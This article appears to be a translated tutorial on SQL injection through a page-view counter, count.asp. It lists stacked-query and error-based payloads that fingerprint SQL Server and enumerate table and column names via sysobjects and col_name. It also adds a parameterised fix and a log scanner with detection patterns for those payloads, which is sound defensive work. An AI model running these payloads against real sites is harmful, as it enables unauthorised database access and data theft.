Summary of uncommon SQL Script Injection Methods

Source: Internet
Author: User
Have you ever come across a site like this? The article system displays articles as static HTML files generated with FSO (the FileSystemObject). This reduces server load and increases access speed, and, second, it is also supposed to stop SQL injection attacks.

Here is how such an article system works: every article has a copy in the database, and in addition an HTML page is generated from a template.

Attack method: view the page source and check whether any page is called through JavaScript, for example a script that updates the view count of an article.

Can we try to inject here: http://server-domain-name/count.asp?Id=1552

Check whether an error occurs. If an error occurs, the injection vulnerability exists, and from there the attack proceeds as usual.
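The reason count.asp breaks like this is that the id parameter is pasted straight into the SQL statement. The following is an added example (not code from the original article, whose site ran classic ASP against SQL Server) that shows the vulnerable pattern beside its hardened form. It uses an in-memory sqlite3 table as a stand-in for the article table, so the exact database behaviour differs from SQL Server, but the point carries over: validate that id is an integer and bind it as a parameter, and neither a trailing semicolon nor a boolean tail can ever reach the parser as SQL.

```python
import re
import sqlite3

# Constructed stand-in for the site's article table; sqlite3 is used only so
# the example runs offline, the original system used SQL Server.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("create table articles (id integer primary key, hits integer not null)")
    conn.executemany("insert into articles values (?, ?)", [(1551, 0), (1552, 0), (1553, 0)])
    conn.commit()
    return conn

def count_vulnerable(conn, raw_id):
    """Mirrors the count.asp pattern from the article: the id value from the
    query string is concatenated into the statement, so whatever the client
    sends after the number is executed as SQL."""
    conn.execute("update articles set hits = hits + 1 where id = " + raw_id)
    conn.commit()

# An article id is a plain integer; anything else is rejected before the
# database ever sees it.
ID_RE = re.compile(r"\d{1,9}")

def count_safe(conn, raw_id):
    """Hardened version: the value must be all digits and is passed as a bound
    parameter, so ';', '--' and 'and exists(...)' tails are data, not SQL."""
    if not ID_RE.fullmatch(raw_id):
        raise ValueError("rejected non-numeric id: %r" % raw_id)
    conn.execute("update articles set hits = hits + 1 where id = ?", (int(raw_id),))
    conn.commit()

def hits(conn):
    """Current view counts, keyed by article id, for checking the effect."""
    return {row[0]: row[1] for row in conn.execute("select id, hits from articles order by id")}

if __name__ == "__main__":
    db = make_db()
    count_vulnerable(db, "1552 or 1=1")   # every article's counter moves
    print("vulnerable:", hits(db))
    db = make_db()
    count_safe(db, "1552")                 # only article 1552 changes
    print("safe:", hits(db))
    for bad in ("1552;", "1552 or 1=1"):
        try:
            count_safe(db, bad)
        except ValueError as e:
            print("safe:", e)
```

Note that the integer check alone already defeats everything shown in this article, because every payload here starts with a non-digit character after 1552; the bound parameter is what protects the string-typed parameters elsewhere in the same site.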

Create a post.htm file and a log.txt text file on the local machine (this is a good habit).

post.htm content: a simple form that makes submitting the input easy.

Whether the backend is SQL Server can be judged as follows: add a semicolon after 1552. If the page still loads normally, it may be SQL Server.

For such a database, you can first create a table: Id=1552;create table AAA(AAA char(20));--

Insert a record: Id=1552;insert into AAA values('test');--

Next, read the names of its tables:

Id=1552;update AAA set AAA=(select top 1 name from sysobjects where xtype='U' and status>0);--

This writes the first table name into the AAA field.

Id=1552 and exists(select * from AAA where AAA>5) will then report an error, and in most cases the table name can be read directly from it:

Microsoft OLE DB Provider for SQL Server error '80040e07'

Syntax error converting the varchar value 'vote' to a column of data type int.

/search.asp, line 21

Here, vote is the table name.

You can also guess a table name first, and then update (select top 1 name from sysobjects where xtype='U' and status>0) into a record of that table so that the value is displayed on the web page.

Once the first table has been read, the second can be read by adding "and name<>'the table name just obtained'" to the condition:

Id=1552;update AAA set AAA=(select top 1 name from sysobjects where xtype='U' and status>0 and name<>'vote');--

Then Id=1552 and exists(select * from AAA where AAA>5)

This reads the second table; continue one table at a time until no more are returned.

The fields are read as follows:

Id=1552;update AAA set AAA=(select top 1 col_name(object_id('table name'),1));--

Then Id=1552 and exists(select * from AAA where AAA>5) produces the error that reveals the first column name.

Id=1552;update AAA set AAA=(select top 1 col_name(object_id('table name'),2));--

Then Id=1552 and exists(select * from AAA where AAA>5) produces the error that reveals the second column name.

... and so on.
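Every request in this sequence leaves a trace in the web server log, and all of them share one property: the id parameter is not a plain integer. The following added detection example (not part of the original article) decodes the query string of each request in a simplified IIS-style log, applies rules for the patterns used above (a second statement after a semicolon, a trailing "--", reads of sysobjects/col_name/object_id, and "and exists(" probes) and flags any request whose id is not purely numeric. The log lines are constructed for the example, with the field layout reduced to date, time, method, uri-stem, uri-query and status; the rule names are my own.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines in a simplified IIS W3C layout
# (date time method uri-stem uri-query status). Not a real capture.
SAMPLE_LOG = """\
2004-03-01 10:00:01 GET /count.asp id=1552 200
2004-03-01 10:00:02 GET /count.asp id=1552; 200
2004-03-01 10:00:03 GET /count.asp id=1552;create+table+AAA(AAA+char(20));-- 200
2004-03-01 10:00:04 GET /count.asp id=1552;update+AAA+set+AAA=(select+top+1+name+from+sysobjects+where+xtype='U'+and+status>0);-- 200
2004-03-01 10:00:05 GET /count.asp id=1552+and+exists(select+*+from+AAA+where+AAA>5) 500
2004-03-01 10:00:06 GET /search.asp q=vote 200
"""

DML = r"(?:create|insert|update|delete|drop|alter|exec|select)\b"
RULES = [
    # a second statement stacked after the one the page intended
    ("stacked_statement", re.compile(r";\s*" + DML, re.I)),
    # comment used to discard the rest of the original statement
    ("comment_terminator", re.compile(r"--\s*$")),
    # schema enumeration through SQL Server catalog objects and functions
    ("catalog_read", re.compile(r"\b(?:sysobjects|syscolumns|col_name|object_id)\b", re.I)),
    # the error-based probe used to read AAA back
    ("boolean_probe", re.compile(r"\b(?:and|or)\s+exists\s*\(", re.I)),
]

def indicators(id_value):
    """Names of all rules matched by one decoded id value; the integer check
    is the catch-all, since a legitimate article id never contains anything
    but digits."""
    found = [name for name, rx in RULES if rx.search(id_value)]
    if not re.fullmatch(r"\d+", id_value):
        found.append("non_numeric_id")
    return found

def query_params(query):
    """Split a raw cs-uri-query into decoded (name, value) pairs. Split on '&'
    only, because ';' is exactly the character the attacker relies on."""
    pairs = []
    for item in query.split("&"):
        if not item:
            continue
        name, _, value = item.partition("=")
        pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs

def scan_log(text):
    """Return one record per request whose id parameter trips any rule."""
    alerts = []
    for line in text.splitlines():
        parts = line.split(" ", 5)
        if len(parts) != 6:
            continue
        date, time, method, stem, query, status = parts
        for name, value in query_params(query):
            if name.lower() != "id":
                continue
            hits = indicators(value)
            if hits:
                alerts.append({"time": date + " " + time, "stem": stem,
                               "status": int(status), "id": value, "indicators": hits})
    return alerts

if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG):
        print(a["time"], a["stem"], a["status"], a["indicators"], repr(a["id"]))
```

The semicolon-only probe from the fingerprinting step ("1552;") matches no keyword rule at all and is caught only by the integer check, which is why a whitelist on the parameter's expected type is a stronger rule than any keyword list. Correlating these hits with 500 responses (the '80040e07' conversion error above) separates the blind probes from the ones that actually leaked a name.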
